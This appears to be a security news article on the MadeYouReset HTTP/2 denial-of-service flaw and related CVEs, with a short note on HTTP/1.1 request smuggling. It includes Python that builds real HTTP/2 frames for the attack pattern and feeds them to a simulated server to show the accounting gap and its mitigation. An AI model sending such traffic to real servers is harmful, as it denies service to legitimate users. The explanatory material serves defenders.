MadeYouReset Vulnerability
HTTP/2 Must Die
Multiple HTTP/2 implementations have been found susceptible to a new attack technique called MadeYouReset that can be exploited to mount powerful denial-of-service (DoS) attacks.
"MadeYouReset bypasses the typical server-imposed limit of 100 concurrent HTTP/2 requests per TCP connection from a client. This limit is intended to mitigate DoS attacks by restricting the number of simultaneous requests a client can send," researchers Gal Bar Nahum, Anat Bremler-Barr, and Yaniv Harel said.
With MadeYouReset, an attacker can push many thousands of requests through a single connection, creating a denial-of-service condition for legitimate users and, in some vendor implementations, escalating into out-of-memory crashes.
The vulnerability has been assigned the generic CVE identifier CVE-2025-8671, although the issue affects several products, each tracked under its own identifier, including:
Apache Tomcat (CVE-2025-48989)
F5 BIG-IP (CVE-2025-54500)
Netty (CVE-2025-55163)
MadeYouReset is the latest HTTP/2 flaw, after Rapid Reset (CVE-2023-44487) and the HTTP/2 CONTINUATION Flood, that can be weaponized to stage large-scale DoS attacks.
Where those two attacks abuse client-sent RST_STREAM frames and CONTINUATION frames, respectively, MadeYouReset builds on Rapid Reset and on its mitigation, which caps the number of streams a client may cancel with RST_STREAM. Instead of cancelling streams itself, the client sends a valid request and then a frame that violates the protocol on that stream (a WINDOW_UPDATE with a zero increment is one such trigger), so that the server issues the RST_STREAM. The stream stops counting against the concurrency limit and the client-cancel counter never moves, while the backend keeps processing the request.
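The accounting gap described above, as an added example written for this page (it is not code from the researchers or from any affected vendor). It frames and parses real RFC 9113 frame headers but only simulates a server's bookkeeping: the `Connection` class, the `attack`/`run` helpers and the traffic they generate are constructed for illustration, the backend is modelled as a counter of in-flight requests, and the zero-increment WINDOW_UPDATE stands in for the several protocol violations that produce a stream-level error.

```python
import struct

# RFC 9113 frame types, flags and error codes used by the model
HEADERS, RST_STREAM, WINDOW_UPDATE = 0x1, 0x3, 0x8
END_STREAM, END_HEADERS = 0x1, 0x4
PROTOCOL_ERROR, CANCEL = 0x1, 0x8
# HPACK static-table indexed fields ":method GET", ":scheme http", ":path /";
# the model never decodes headers, so the exact payload does not matter
HPACK_GET_ROOT = b"\x82\x86\x84"


def build_frame(ftype, flags, stream_id, payload=b""):
    """Serialise one frame: 24-bit length, type, flags, R bit + 31-bit stream id."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + struct.pack("!I", stream_id & 0x7FFFFFFF) + payload)


def parse_frames(data):
    """Split a byte string into (type, flags, stream_id, payload) tuples."""
    frames, off = [], 0
    while off + 9 <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        sid = struct.unpack("!I", data[off + 5:off + 9])[0] & 0x7FFFFFFF
        frames.append((data[off + 3], data[off + 4], sid, data[off + 9:off + 9 + length]))
        off += 9 + length
    return frames


class Connection:
    """Hypothetical server-side bookkeeping for one HTTP/2 connection (a model, not a server)."""

    def __init__(self, max_streams=100, reset_budget=100, count_server_resets=False):
        self.max_streams = max_streams            # SETTINGS_MAX_CONCURRENT_STREAMS
        self.reset_budget = reset_budget          # Rapid Reset mitigation: resets allowed per connection
        self.count_server_resets = count_server_resets
        self.open_streams = set()
        self.backend_inflight = 0   # requests handed to the backend; a reset does not cancel them
        self.charged_resets = 0
        self.sent = []              # frames the server emits
        self.closed = False         # a real server would send GOAWAY(ENHANCE_YOUR_CALM)

    def _charge_reset(self):
        self.charged_resets += 1
        if self.charged_resets > self.reset_budget:
            self.closed = True

    def on_frame(self, ftype, flags, sid, payload):
        if self.closed:
            return
        if ftype == HEADERS and len(self.open_streams) < self.max_streams:
            self.open_streams.add(sid)            # over the limit a real server answers REFUSED_STREAM
            self.backend_inflight += 1
        elif ftype == RST_STREAM:                 # client cancels: the Rapid Reset pattern
            self.open_streams.discard(sid)
            self._charge_reset()
        elif ftype == WINDOW_UPDATE and sid in self.open_streams:
            increment = struct.unpack("!I", payload)[0] & 0x7FFFFFFF
            if increment == 0:                    # RFC 9113 s6.9: stream error of type PROTOCOL_ERROR
                self.open_streams.discard(sid)    # slot freed, backend work continues
                self.sent.append(build_frame(RST_STREAM, 0, sid, struct.pack("!I", PROTOCOL_ERROR)))
                if self.count_server_resets:      # charge server-sent resets against the same budget
                    self._charge_reset()

    def feed(self, data):
        for frame in parse_frames(data):
            self.on_frame(*frame)


def client_cancel(sid):
    """Rapid Reset follow-up: the client resets its own stream."""
    return build_frame(RST_STREAM, 0, sid, struct.pack("!I", CANCEL))


def zero_window_update(sid):
    """MadeYouReset follow-up: a protocol violation that makes the server reset the stream."""
    return build_frame(WINDOW_UPDATE, 0, sid, struct.pack("!I", 0))


def attack(n, follow_up):
    """Constructed traffic: n valid GET requests, each followed by follow_up(stream_id)."""
    out = b""
    for i in range(n):
        sid = 2 * i + 1                           # client-initiated streams have odd ids
        out += build_frame(HEADERS, END_STREAM | END_HEADERS, sid, HPACK_GET_ROOT)
        out += follow_up(sid)
    return out


def run(traffic, **options):
    """Feed traffic to a fresh connection; return (backend_inflight, server_resets_sent, closed)."""
    conn = Connection(**options)
    conn.feed(traffic)
    return conn.backend_inflight, len(conn.sent), conn.closed


if __name__ == "__main__":
    print("Rapid Reset, client resets counted: ", run(attack(500, client_cancel)))
    print("MadeYouReset, client resets counted:", run(attack(500, zero_window_update)))
    print("MadeYouReset, all resets counted:   ", run(attack(500, zero_window_update), count_server_resets=True))
```

With the default settings the Rapid Reset traffic trips the budget after 101 requests and the connection is dropped, while the MadeYouReset traffic never touches the budget: all 500 requests reach the backend even though at most one stream is ever open and the server itself has sent 500 RST_STREAM frames. Charging server-initiated resets to the same budget closes that gap in the model, but it is still only rate limiting; the robust fix is to tie backend work to the stream's lifetime so that a reset, whoever sends it, actually cancels the request.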
HTTP/1.1 Must Die
HTTP request smuggling is an attack on the application-layer protocol that abuses inconsistencies in how front-end and back-end servers parse non-RFC-compliant HTTP requests, letting an attacker "smuggle" a request past security controls.
"HTTP/1.1 has a fatal flaw: Attackers can create extreme ambiguity about where one request ends, and the next request starts," PortSwigger's James Kettle said. "HTTP/2+ eliminates this ambiguity, making desync attacks virtually impossible. However, simply enabling HTTP/2 on your edge server is insufficient – it must be used for the upstream connection between your reverse proxy and origin server."
CVE Reference List
CVE-2025-8671: Generic identifier for MadeYouReset vulnerability.
CVE-2025-48989: Apache Tomcat implementation impact.
CVE-2025-54500: F5 BIG-IP implementation impact.
CVE-2025-55163: Netty implementation impact.
CVE-2025-32094: Related vulnerability reference.
CVE-2025-4366: Related vulnerability reference.
The CVE IDs above and their associated vendors are listed for tracking security patches.